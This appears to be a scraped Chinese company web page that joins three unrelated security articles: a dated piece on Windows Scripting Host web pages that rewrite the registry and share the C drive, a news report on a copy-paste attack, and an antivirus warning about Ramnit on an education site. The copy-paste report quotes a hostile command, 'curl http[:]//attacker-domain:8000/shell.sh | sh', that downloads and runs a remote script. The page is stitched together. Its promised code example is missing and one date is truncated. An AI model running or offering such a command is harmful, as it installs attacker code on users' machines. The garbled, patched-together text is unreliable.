整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
Windows Scripting Host Object Reference--罪魁禍首?
Windows Scripting Host Object Reference,以下簡稱Wsh.在windows 9x的默認安裝時都有的,我發現絕大多數上網用戶都沒有卸載它。
我從來沒想到利用Wsh結合javascript能寫出如此厲害的網頁病毒來。先說說我寫這文章的來由:
我的一個朋友在訪問重慶吻網(www.cqkiss.com)后,他以后每次啟動機器在登陸對話框出現之前都會出現歡迎光臨重慶吻網(www.cqkiss.com)的字樣,由于平時對注冊表的東西留意得比較多,我知道肯定是在注冊表里改了什么設置。
由網頁可以直接操縱注冊表?我感到疑惑,但經過我的研究發現,事實上確實可以。通過我的研究發現,Wsh的功能非常嚇人,我們可以寫出特定的頁面,你在訪問它之后可能出現如下后果:
1、刪除你硬盤上的指定文件,創建和修改文本文件,autoexec.bat是文本文件吧。我作了試驗,確實可以修改它。
2、執行操作系統允許的任意程序;
3、把你的C盤設置為完全共享,然后別人可以在你的機器上安置木馬。我在所舉出的網頁例子中,就實現了設置C盤為隱含的完全共享的功能。由于你的網站只涉及到注冊表的操作,因此我在所舉出的例子中就只包含了這一部分。別的如1和2所述的功能實現就不給出。
MSDN上關于wsh對注冊表的操作說明:
The following table describes the methods associated with the WshShell object.
Method Description RegDelete --->Deletes a specified key or value from the registry.
RegRead --> Returns a specified key or value from the registry.
RegWrite --> Sets a specified key or value in the registry.
更詳細的說明請自己參照MSDN上的說明
在下面的網頁代碼例子中,我只嘗試了RegWrite和RegDelete兩種方法的使用。
網頁代碼的例子:
(注:/*...*/內的文字是我的說明,在實際的網頁代碼中應去掉。當然它的功能實現需要wsh的支持)
/*index.htm文件內容如下:*/
/*這一行好象必須要,意思不太明了*/
為你作了一件好事--你現在可以使用Regedit.exe了。
同時作了一件更大的壞事--把你的C盤完全共享了,請參照源代碼消除它好了。
如果你在上網前關掉了Windows script host,那么這個網頁代碼不會起作用。呵呵........
由此看來,上網真是一件很危險的事情?所以,我在上網前就先把那個Wsh給卸載掉了,就是在控制面板里選擇“添加/刪除程序”,再選擇"windows安裝程序"里的附件,再選擇“詳細資料”中的Windows Scripting Host,把它卸載掉就不用擔心它來害你了,不過你作的網頁上也不允許害別人喲。
你如果嫌麻煩就直接把c:\windows目錄底下的一個叫Wshom.ocx的文件改名好了,我就是把它改為Wshom.ocx.old的。
弈安傳媒科技微課堂,每天分享財經資訊,計算機技術知識,人生感悟,創業指導以及各種專業技術知識資料學習交流.移動學習平臺、知識分享平臺。隨時隨地的學習,如果你喜歡成長,這里你不容錯過的地方.弈安傳媒科技培訓關注:關注自己成長,分享內容,分享自己的技術,成就未來.
[弈安傳媒科技提升自己的平臺]請關注:頭條號及公眾號 弈安傳媒科技
全研究人員警告,HTML頁面上的命令列可能藏匿惡意程序碼,開發者稍有不察直接復制貼上終端時,可能就讓黑客得以于程序中植入后門。
復制粘貼要當心,病毒代碼在執行
一名安全研究人員Gabriel Friedlander近日警告,隨手從網絡上復制與貼上(Copy/Paste)命令列時要特別小心,因為黑客可能趁此駭進開發者的系統或應用程序。
Friedlander打造了一個概念性驗證攻擊手法,他設計一個假裝可用來更新Ubuntu作業系統的命令列,該命令列顯示的文字很簡單,為「sudo apt update」,但當開發者復制它,并將它貼上記事本或終端時,它出現的卻是「curl http[:]//attacker-domain:8000/shell.sh | sh 」,若是直接貼入終端,它將立即執行。
這是因為Friedlander在此一HTML頁面上藏匿了JavaScript程序碼,而讓開發者眼見的文字與貼上之后所呈現的內容完全不同。
Friedlander說,不管是新手或是熟練的開發者,都可能會從網絡上復制命令列或部份程序碼,但這是非常危險的行為,也許會讓黑客直接于程序中植入后門,相關的攻擊非常地簡單,卻可能帶來極大的傷害,建議開發者應永遠避免于終端貼上直接自網絡上復制的命令列。
0月9日,火絨團隊發出安全警告,火絨工程師通過“火絨威脅情報系統”發現,尚德機構部分省份(91ld.com域名)的在職研究生培訓報名服務中心頁面攜帶感染型病毒“Ramnit”。經分析,該病毒或是通過“供應鏈污染”的方式進行傳播,即網站開發者開發環境被病毒感染,導致制作的網頁攜帶病毒。但該病毒僅會感染未開啟瀏覽器安全選項且版本較低的操作系統,因此普通用戶不必過于擔心。
如果病毒成功入侵電腦后,會感染電腦中的所有可執行文件和HTML文件,竊取用戶上網信息(譬如瀏覽器cookies等),并且通過這些被感染文件進行重復傳播。建議近期登錄過上述相關網站的用戶,及時下載“火絨安全軟件”進行查殺。火絨產品無需升級,即可查殺該病毒。
目前,“供應鏈污染”正在成為網絡平臺上病毒傳播的一大主要方式,火絨也曾多次發布過相關報道。火絨工程師建議尚德機構盡快排查上述問題,避免出現病毒通過平臺進行傳播的可能性。另外,此次事件折射出的平臺數據安全監管問題,應當引起廣大管理人員、開發人員的警惕 ,需要實時加強安全審查力度,必要時通過安裝合格的安全軟件進行自查,阻止病毒傳播。
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
